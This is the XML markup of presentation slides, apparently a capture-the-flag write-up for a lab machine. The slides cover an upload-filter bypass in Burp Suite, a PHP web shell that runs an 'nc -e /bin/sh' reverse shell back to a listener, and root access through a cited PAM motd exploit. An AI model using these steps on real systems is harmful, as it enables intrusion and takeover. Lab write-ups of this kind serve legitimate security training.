                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>second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check,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possible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intercept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request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with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Burp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Suite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modify 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request.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Simply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changing </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>application/php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b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>image/png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in the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>POST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data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-55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>all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that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required.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2495550"/>
            <a:ext cx="5943600" cy="465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7292326"/>
            <a:ext cx="5827395" cy="180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735">
              <a:lnSpc>
                <a:spcPct val="130700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Looking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back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at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Dirbuster results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for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torrent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directory,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appears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there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an </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>upload 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directory.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Browsing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reveals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listing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of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>all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uploads,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with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35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>PHP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listed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(although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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>does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get</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-13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renamed).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30700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="975"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="75" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>A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shell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can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be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obtained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from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this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point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by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starting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local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nc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listener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with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command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nc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-nvlp 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1234. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="1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start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reverse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connection,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simply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browse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 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>10.10.10.6/torrent/upload/&lt;FILENAME&gt;.php?cmd=nc </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>-e </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>/bin/sh </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&lt;LAB </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>IP&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-13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343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>&lt;PORT&gt;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user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flag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can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be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obtained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from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343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>/home/george/user.txt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563100"/>
            <a:ext cx="7772400" cy="495300"/>
            <a:chOff x="0" y="9563100"/>
            <a:chExt cx="7772400" cy="495300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="object 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="9639299"/>
              <a:ext cx="7772400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63100"/>
              <a:ext cx="7772400" cy="495300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7772400" h="495300">
                  <a:moveTo>
                    <a:pt x="0" y="495300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="49530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7772400" cy="1743075"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7772400" cy="174307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7772400" cy="1276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7772400" cy="1743710"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7772400" h="1743710">
                  <a:moveTo>
                    <a:pt x="7772400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="140487" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1338262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1743087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140487" y="1743087"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140487" y="1338262"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="1338262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7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809813"/>
            <a:ext cx="5871845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424242"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Privilege</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1400" b="1" spc="-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424242"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Escalation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Exploit: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="11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rebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.exploit-db.com/exploits/14339/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30700"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="975"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="1100" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Using </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>ls </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>-lAR /home/george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reveals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an uncommon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(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>motd.legal-displayed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) in the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>.cache 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directory. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="75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bit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of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research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finds </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Exploit-DB </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>14339</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>,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and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appears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that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="65" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>PAM </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-130" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>1.1.0 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>has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file 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tampering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privilege escalation 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vulnerability.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From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here, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>it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possible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execute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script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on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 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target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machine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to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get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root </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-25" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>privileges.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Note </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>that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a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semi-interactive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shell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is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required, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>which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can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be 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acquired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43744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>by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343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>running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command</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100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343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>python</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-50" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t> -c</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-5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343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>'import</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-50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343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>pty;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-5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343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>pty.spawn("/bin/sh")'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-5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in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the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35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>non-interactive </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>shell. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-30" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>root flag </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>can </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-245" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744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343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>obtained </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" spc="-45" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1100" b="1" spc="-55" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="343744"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>/root/root.txt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4029075"/>
            <a:ext cx="5943600" cy="395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563100"/>
            <a:ext cx="7772400" cy="495300"/>
            <a:chOff x="0" y="9563100"/>
            <a:chExt cx="7772400" cy="495300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="9639299"/>
              <a:ext cx="7772400" cy="409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3100"/>
              <a:ext cx="7772400" cy="495300"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7772400" h="495300">
                  <a:moveTo>
                    <a:pt x="0" y="495300"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="49530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7772400" cy="1600200"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="7772400" cy="16002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7772400" cy="12763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7772400" cy="1600835"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="7772400" h="1600835">
                  <a:moveTo>
                    <a:pt x="7772400" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="164299" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="140487" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1600212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164299" y="1600212"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="164299" y="1457337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7772400" y="1457337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25" dirty="0"/>
              <a:t>Page </a:t>
            </a:r>
            <a:fld id="{81D60167-4931-47E6-BA6A-407CBD079E47}" type="slidenum">
              <a:rPr spc="70" dirty="0"/>
              <a:t>8</a:t>
            </a:fld>
            <a:r>
              <a:rPr spc="-215" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-254" dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr spc="-15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083C6-9268-48BE-B3B1-7B397B84498A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1600200" y="43434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THANK YOU !</a:t>
            </a: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67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669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Raushan Raj</dc:creator>
  <cp:lastModifiedBy>Raushan Raj</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-09-11T05:04:53Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-11T05:20:30Z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2020-09-11T00:00:00Z</vt:filetime>
  </property>
</Properties>
</file>